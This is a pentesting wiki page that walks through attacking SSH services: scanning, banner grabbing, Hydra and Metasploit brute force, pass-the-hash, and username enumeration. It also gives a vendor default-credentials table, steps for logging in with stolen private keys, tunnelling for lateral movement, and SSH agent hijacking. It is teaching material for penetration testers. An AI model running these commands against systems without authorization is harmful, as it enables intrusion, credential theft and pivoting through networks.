๐Ÿ•ต๏ธ
VeryLazyTech
๐Ÿ“œ Medium๐Ÿ›’ My Shop๐Ÿ‘พ Github๐Ÿ“ฉ Telegram ๐Ÿ“บ YouTubeโœ– Twitter
  • ๐Ÿ•ต๏ธWelcome!
    • VeryLazyTech
    • Support VeryLazyTech
      • ๐Ÿ‘พ GitHub
      • ๐Ÿ“œ Medium
      • โ˜• My Shop
      • ๐Ÿ“บ YouTube
      • โœ– Twitter
      • ๐Ÿ“ฉ Telegram
  • ๐Ÿ›ก๏ธ Vulnerabilities and Exploits
    • CVE - POC
      • Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692
      • POC - CVE-2024โ€“4956 - Nexus Repository Manager 3 Unauthenticated Path Traversal
      • POC - CVE-2024-45241: Path Traversal in CentralSquare's CryWolf
      • Telerik Auth Bypass CVE-2024-4358
      • Check Point Security Gateways Information Disclosure - CVE-2024-24919
      • CVE-2024-23897 - Jenkins File Read Vulnerability
      • CVE-2024โ€“10914- Command Injection Vulnerability in name parameter for D-Link NAS
      • POC - CVE-2024-21534 Jsonpath-plus vulnerable to Remote Code Execution (RCE)
      • CVE-2024-9935 - PDF Generator Addon for Elementor Page Builder <= 1.7.5 - Unauthenticated Arbitrary
      • CVE-2024-50623- Cleo Unrestricted file upload and download
      • POC - WordPress File Upload plugin, in the wfu_file_downloader.php file before version <= 4.24.11
      • POC - Remote and unauthenticated attacker can send crafted HTTP requests to RCE - cve-2025-3248
      • POCโ€Š-โ€ŠCVE-2025โ€“2539 File Away <= 3.9.9.0.1โ€Š-โ€ŠMissing Authorization to Unauthenticated Arbitrary File
      • POC - CVE-2025-29306 FOXCMS /images/index.html Code Execution Vulnerability
  • ๐Ÿ•ต๏ธโ€โ™‚๏ธDorks
    • GitHub Dorks
    • Google Dork Online Tool
  • ๐Ÿ“š Resources
    • Top Hacking Books for 2024: FREE and Paid
    • How to Study for OSCP with the PWK Book PDF
    • Top 20 phishing tools to use in 2024
    • Top 8 Bug Bounty Books for 2025: Must-Reads for Ethical Hackers
    • Top Hacking Tools and Skills You Need to Learn in 2025
    • Offensive Cloud
    • Penetration Testing & Hacking Tools List
    • Top Cybersecurity Books by Topic
  • The Ultimate Penetration Testing Methodology (2025 Edition)
  • ๐Ÿ•ธ๏ธPentesting Web
    • Client Side Template Injection (CSTI)
    • Identify a Serverโ€™s Origin IP
    • 2FA/MFA/OTP Bypass
  • IDOR
  • Open Redirect
  • Subdomain Takeover
  • Penetration Testing WiFi Networks
  • Client-Side Path Traversal
  • Clickjacking
  • Command Injection
  • JWT Vulnerabilities
  • Bypass rating limit
  • CORS - Misconfigurations & Bypass
  • LDAP Injection
  • File upload vulnerabilities
  • Content Security Policy (CSP) bypass
  • ๐ŸงLinux
    • Practical Linux Commands
    • Bypassing Bash Restrictions - Rbash
    • Privilege escalation - Linux
  • Linux Environment Variables
  • ๐ŸชŸWindows
    • Active Directory Methodology
  • ๐ŸŒNetwork Pentesting
    • FTP - Port 21
    • SSH- Port 22
    • Telnet - Port 23
    • SMTP/s - Port 25,465,587
    • WHOIS - Port 43
    • TACACS+ - Port 49
    • DNS - Port 53
    • TFTP/Bittorrent-tracker - Port 69/UDP
    • Finger - Port 79
    • Web - Port 80,443
    • Kerberos - Port 88
    • POP - Port 110/995
    • Portmapper - Port 111/TCP/UDP
    • Ident - Port 113
    • NTP - Port 123/UDP
    • MSRPC - Port 135, 539
    • NetBios - Port 137,138,139
    • SMB - Port 139 445
    • IMAP - Port 143, 993
    • SNMP - Ports 161, 162, 10161, and 10162/UDP
    • IRC - Ports 194,6667,6660-7000
    • Check Point Firewall - Port 264
    • LDAP - Ports 389, 636, 3268, 3269
    • IPsec/IKE VPN - Port 500/UDP
    • Modbus - Port 502
    • Rexec - Port 512
    • Rlogin - Port 513
    • Rsh - Port 514
    • Line Printer Daemon (LPD) - Port 515
    • Apple Filing Protocol (AFP) - PORT 548
    • RTSP - Port 554, 8554
    • IPMI - Port 623/UDP/TCP
    • Internet Printing Protocol (IPP) - Port 631
    • EPP - Port 700
    • Rsync - Port 873
    • Rusersd Service - Port 1026
    • Socks - Port 1080
    • Java RMI - RMI-IIOP - Port 1098/1099/1050
    • MSSQL (Microsoft SQL Server) - Port 1433
    • Oracle TNS Listener - Port 1521,1522-1529
  • PPTP - Port 1723
  • MQTT (Message Queuing Telemetry Transport) - Port 1883
  • Compaq HP Insight Manager - Port 2301, 2381
  • NFS Service - Port 2049
  • Docker - Port 2375,2376
  • Squid - Port 3128
  • iScsi - Port 3260
  • SAPRouter - Port 3299
  • ๐Ÿ˜ŽPost-exploitation
    • File Transfer Cheatsheet: Windows andย Linux
  • ๐Ÿง‘โ€๐Ÿ”งTechnical guides
    • Kali Linux - Installation
Powered by GitBook
On this page
  • Basic Information
  • Example Attack Workflow
  • Reconnaissance:
  • Vulnerability Assessment:
  • Brute-Force or Key Exploitation:
  • Post-Exploitation:
  • Reconnaissance
  • Port Scanning
  • Service Enumeration
  • Banner Grabbing
  • Vulnerability Assessment
  • Check for Known Vulnerabilities
  • Brute force
  • Advanced Brute Force Techniques
  • Public Key Authentication Weaknesses
  • Exploit Vulnerabilities
  • Metasploit for SSH Login Brute-Force:
  • Metasploit for SSH Version Enumeration:
  • Additional Exploits:
  • Default Credentials
  • Using Exposed SSH Keys to Authenticate Directly
  • Post-Exploitation
  • Setting Up SSH Tunnels for Lateral Movement
  • Hijacking Existing SSH Sessions

Was this helpful?

  1. Network Pentesting

SSH- Port 22

PreviousFTP - Port 21NextTelnet - Port 23

Last updated 6 months ago

Was this helpful?

  • Become VeryLazyTech ! ๐ŸŽ

  • Follow us on:

    • โœ– Twitter .

    • ๐Ÿ‘พ Github .

    • ๐Ÿ“œ Medium .

  • Visit our for e-books and courses. ๐Ÿ“š

  • Support us and . โ˜•

Basic Information

SSH (Secure Shell or Secure Socket Shell) is a network protocol that enables a secure connection to a computer over an unsecured network. It is essential for maintaining the confidentiality and integrity of data when accessing remote systems.

Default port: 22


Example Attack Workflow

Reconnaissance:

  • Use Nmap to scan for open SSH ports. Port Scanning

  • Identify the SSH version using nmap -sV. Service Enumeration

  • Attempt to grab the SSH banner for more info (nc or telnet). Banner Grabbing

Vulnerability Assessment:

  • Use ssh-audit to find weak configurations. Public Key Authentication Weaknesses

  • Search for CVEs related to the detected SSH version. Check for Known Vulnerabilities

Brute-Force or Key Exploitation:

  • If password authentication is used, attempt brute-forcing with Hydra or Medusa. Brute force

  • If SSH keys are exposed, use the key to authenticate directly. Using Exposed SSH Keys to Authenticate Directly

Post-Exploitation:

  • Set up SSH tunnels for lateral movement. Setting Up SSH Tunnels for Lateral Movement

  • Hijack existing SSH sessions if possible. Hijacking Existing SSH Sessions


Reconnaissance

Port Scanning

Use Nmap to identify SSH ports (default is 22).

nmap -p22 <target-ip>

Service Enumeration

Check the SSH service version to identify potential vulnerabilities.

nmap -sV -p22 <target-ip>

Banner Grabbing

Extract the SSH banner to see the service version and OS information.

nc <target-ip> 22


Vulnerability Assessment

Check for Known Vulnerabilities

  • Once you have the SSH version from the previous steps, you can search for known vulnerabilities (CVEs) in public databases like CVE Details, or automate the process using Nmap NSE scripts.

nmap --script sshv1 -p22 <target-ip>
nmap -p22 <ip> --script ssh2-enum-algos # Retrieve supported algorythms 
nmap -p22 <ip> --script ssh-hostkey --script-args ssh_hostkey=full # Retrieve weak keys
nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root" # Check authentication methods

Brute force

  • Use Hydra, Medusa to attempt brute force attacks.

hydra -l <username> -P <password-list> <target-ip> ssh
medusa -h <target-ip> -u <username> -P <password-list> -M ssh

Advanced Brute Force Techniques

In more advanced penetration testing scenarios, attackers may leverage captured password hashes instead of brute-forcing plaintext passwords. This technique is known as Pass the Hash (PTH), and it allows attackers to authenticate using password hashes directly, bypassing traditional brute force limitations. Two common tools used for this purpose in the SSH context are CrackMapExec and pth-ssh.

Parallel SSH Brute-Forcing with CrackMapExec

CrackMapExec (CME) is a post-exploitation tool that can automate tasks across an entire network, including parallel brute-forcing of SSH login credentials. CME allows for simultaneous brute force attacks on multiple targets while leveraging password hashes in addition to plaintext passwords.

crackmapexec ssh <target-ip> -u <username> -p <password>
  • <target-ip>: The IP address of the target machine.

  • -u <username>: The username to attempt authentication with.

  • -p <password>: The password or password list to use in the brute force attempt.

Pass-the-Hash with pth-ssh

Pass the Hash (PTH) attacks leverage stolen password hashes instead of trying to guess or brute-force plaintext passwords. pth-ssh is a tool specifically designed for SSH-based PTH attacks. It allows you to authenticate to an SSH service using a captured password hash, effectively bypassing password brute-force rate limiting or lockout mechanisms.

pth-ssh <username>@<target-ip> <password-hash>
  • <username>: The username to attempt authentication with.

  • <target-ip>: The IP address of the target machine.

  • <password-hash>: The hash of the password that will be used to authenticate (instead of the plaintext password).

Why Use Pass-the-Hash (PTH) in SSH Attacks?

  • Stealthier than Brute-Force Attacks: Brute force attempts can be noisy and trigger security alarms, whereas PTH attacks are often less detectable, as you're directly using a valid authentication hash.

  • Bypass Rate Limits: Many SSH servers enforce rate limits or lockout periods after failed login attempts. Using PTH avoids these protections since the correct hash bypasses the normal authentication process.

  • Post-Exploitation: In scenarios where you've already compromised a machine and retrieved password hashes (e.g., /etc/shadow file on Linux), PTH allows you to pivot across the network more quickly.

Where to Find Password Hashes?

  • Post-Exploitation Tools: After initial access to a system, tools like Mimikatz, John the Ripper, or Hashcat can extract password hashes from memory, disk, or network traffic.

  • Linux Systems: On Linux, password hashes are often stored in /etc/shadow (although the file is root-only).

  • Windows Systems: Password hashes are stored in the SAM (Security Account Manager) database, and tools like Mimikatz can extract these for later use in PTH attacks.

Public Key Authentication Weaknesses

  • If SSH key-based authentication is used, weak keys or poorly secured key files can be an entry point. Tools like ssh-audit can help find weaknesses in SSH configurations and exposed keys.

    ssh-audit <target-ip>

Exploit Vulnerabilities

Exploiting Vulnerabilities (e.g., CVE-2018-15473)

Certain vulnerabilities like CVE-2018-15473 (username enumeration) allow attackers to discover valid usernames by analyzing SSH responses. Exploiting outdated ciphers or protocol flaws can also lead to successful attacks.

Metasploit for SSH Login Brute-Force:

use auxiliary/scanner/ssh/ssh_login
set RHOSTS <target-ip>
set USERNAME <username>
set PASS_FILE <path-to-password-list>
run
  • use auxiliary/scanner/ssh/ssh_login: This module attempts to brute-force SSH credentials.

  • RHOSTS <target-ip>: The target's IP address.

  • USERNAME <username>: Username to brute-force.

  • PASS_FILE <path-to-password-list>: File containing passwords.

Metasploit for SSH Version Enumeration:

use auxiliary/scanner/ssh/ssh_version
set RHOSTS <target-ip>
run
  • use auxiliary/scanner/ssh/ssh_version: This module scans and detects the SSH version running on the target.

  • RHOSTS <target-ip>: The IP address of the target system.

Additional Exploits:

CVE-2018-15473 allows username enumeration:

python ssh_enum.py <target-ip> -U <user-list>

This Python script attempts to enumerate valid usernames by analyzing SSH responses during login attempts.

CVE-2008-0166 (OpenSSL Debian Random Number Generator Vulnerability)

This is an older but critical vulnerability that affected Debian-based systems using OpenSSL, allowing attackers to guess private keys.

If the system is vulnerable to this, SSH keys can be recreated based on weak random numbers.

  1. Download the key list for vulnerable Debian OpenSSL versions.

    git clone https://github.com/g0tmi1k/debian-ssh.git
  2. Search for the corresponding weak key.

    cd debian-ssh
    ./find_key.py <target-ip> <username>

Default Credentials

Vendor
Usernames
Passwords

APC

apc, device

apc

Brocade

admin

admin123, password, brocade, fibranne

Cisco

admin, cisco, enable, hsa, pix, pnadmin, ripeop, root, shelladmin

admin, Admin123, default, password, secur4u, cisco, Cisco, _Cisco, cisco123, C1sco!23, Cisco123, Cisco1234, TANDBERG, change_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme

Citrix

root, nsroot, nsmaint, vdiadmin, kvm, cli, admin

C1trix321, nsroot, nsmaint, kaviza, kaviza123, freebsd, public, rootadmin, wanscaler

D-Link

admin, user

private, admin, user

Dell

root, user1, admin, vkernel, cli

calvin, 123456, password, vkernel, Stor@ge!, admin

EMC

admin, root, sysadmin

EMCPMAdm7n, Password#1, Password123#, sysadmin, changeme, emc

HP/3Com

admin, root, vcx, app, spvar, manage, hpsupport, opc_op

admin, password, hpinvent, iMC123, pvadmin, passw0rd, besgroup, vcx, nice, access, config, 3V@rpar, 3V#rpar, procurve, badg3r5, OpC_op, !manage, !admin

Huawei

admin, root

123456, admin, root, Admin123, Admin@storage, Huawei12#$, HwDec@01, hwosta2.0, HuaWei123, fsp200@HW, huawei123

IBM

USERID, admin, manager, mqm, db2inst1, db2fenc1, dausr1, db2admin, iadmin, system, device, ufmcli, customer

PASSW0RD, passw0rd, admin, password, Passw8rd, iadmin, apc, 123456, cust0mer

Juniper

netscreen

netscreen

NetApp

admin

netapp123

Oracle

root, oracle, oravis, applvis, ilom-admin, ilom-operator, nm2user

changeme, ilom-admin, ilom-operator, welcome1, oracle

VMware

vi-admin, root, hqadmin, vmware, admin

vmware, vmw@re, hqadmin, default


Using Exposed SSH Keys to Authenticate Directly

If you have access to an exposed or stolen SSH private key (id_rsa), you can use it to authenticate directly to the SSH service of a target system.

Step-by-Step Instructions:

  1. Obtain the SSH Private Key: The private key typically has the filename id_rsa. Ensure it has the correct permissions (600) before attempting to use it.

  2. Check and Set Permissions: The SSH client requires that the private key file has restricted permissions (only the owner can read it). Set the correct permissions:

    chmod 600 id_rsa
  3. SSH Into the Target Using the Exposed Key: Use the following command to SSH into the target using the private key.

    ssh -i id_rsa <username>@<target-ip>
    • id_rsa: The private key file you obtained.

    • <username>: The username for the SSH login.

    • <target-ip>: The IP address or hostname of the target system.

    Example:

    ssh -i id_rsa root@192.168.1.10
  4. Verify Access: If the key is valid and properly configured on the target, you should now have SSH access to the target system without needing to brute force credentials.


Post-Exploitation

Setting Up SSH Tunnels for Lateral Movement

SSH tunneling allows you to create an encrypted tunnel through the compromised machine to reach other machines on an internal network. This is useful for pivoting in post-exploitation scenarios.

Step-by-Step Instructions:

  1. SSH Local Port Forwarding: This allows you to forward a local port on your machine to a port on another machine via the SSH server. Itโ€™s useful when you want to access an internal service.

    Command:

    ssh -L <local-port>:<internal-ip>:<internal-port> <username>@<target-ip>
    • <local-port>: The port on your local machine that you want to use.

    • <internal-ip>: The internal IP address of the machine behind the SSH server you want to reach.

    • <internal-port>: The port on the internal machine that you want to access.

    • <username>@<target-ip>: Credentials and IP address of the compromised SSH server.

    Example:

    ssh -L 8080:10.10.10.5:80 root@192.168.1.10

    This command forwards your local port 8080 to port 80 on the internal machine with IP 10.10.10.5. After this, you can access the internal server by going to http://localhost:8080 in your browser.

  2. SSH Remote Port Forwarding: This method allows you to expose a port from your local machine to the target network. Itโ€™s useful for reverse shell setups.

    Command:

    ssh -R <remote-port>:<local-ip>:<local-port> <username>@<target-ip>

    Example:

    ssh -R 9000:localhost:22 root@192.168.1.10

    This will allow you to connect to your local SSH service (port 22) from the target machine via port 9000.

  3. Dynamic SSH Tunneling with SOCKS Proxy: You can create a dynamic SSH tunnel using a SOCKS proxy, which allows you to route traffic through the SSH server to any machine inside the network.

    Command:

    ssh -D <local-port> <username>@<target-ip>

    Example:

    ssh -D 8080 root@192.168.1.10

    This creates a SOCKS proxy on localhost:8080. You can configure your browser or proxy-aware tool (like Burp Suite) to route traffic through this proxy.


Hijacking Existing SSH Sessions

In certain post-exploitation scenarios, it may be possible to hijack existing SSH sessions. This typically involves identifying and using SSH agent forwarding or hijacking a socket used by the active SSH session.

Step-by-Step Instructions:

  1. Check for Active SSH Sessions: After gaining access to a system, you can check for active SSH sessions by looking for SSH processes.

    Command:

    ps aux | grep ssh

    This will show the active SSH connections and the processes tied to them. You can also check the /proc directory for further details.

  2. Check for SSH Agent Forwarding: If SSH agent forwarding is enabled, you may be able to impersonate the user and reuse their SSH session. Check for SSH agent sockets in the /tmp/ directory.

    Command:

    env | grep SSH_AUTH_SOCK

    If you find an SSH_AUTH_SOCK, it indicates the presence of an SSH agent. The agent stores private keys in memory, and you can use these keys to authenticate to other systems.

  3. Hijacking the SSH Agent: If you find the SSH agent socket, you can use it to impersonate the user.

    Command:

    ssh-add -l

    This will list the keys that are currently available in the agent. If keys are listed, you can use them to access other systems.

  4. Using Hijacked SSH Agent for Pivoting: With the SSH agent hijacked, you can SSH to other systems without needing the actual private key, as long as the agent is authorized on those systems.

    Command:

    ssh -A <username>@<target-ip>

    Example:

    ssh -A admin@10.10.10.5

    This forwards your hijacked SSH agent to the new target system, allowing you to use the stored keys for authentication.

๐ŸŒ
member
@VeryLazyTech
@VeryLazyTech
@VeryLazyTech
shop
buy me a coffee
E - Book - SSH Penetration TestingBuy Me a Coffee
Logo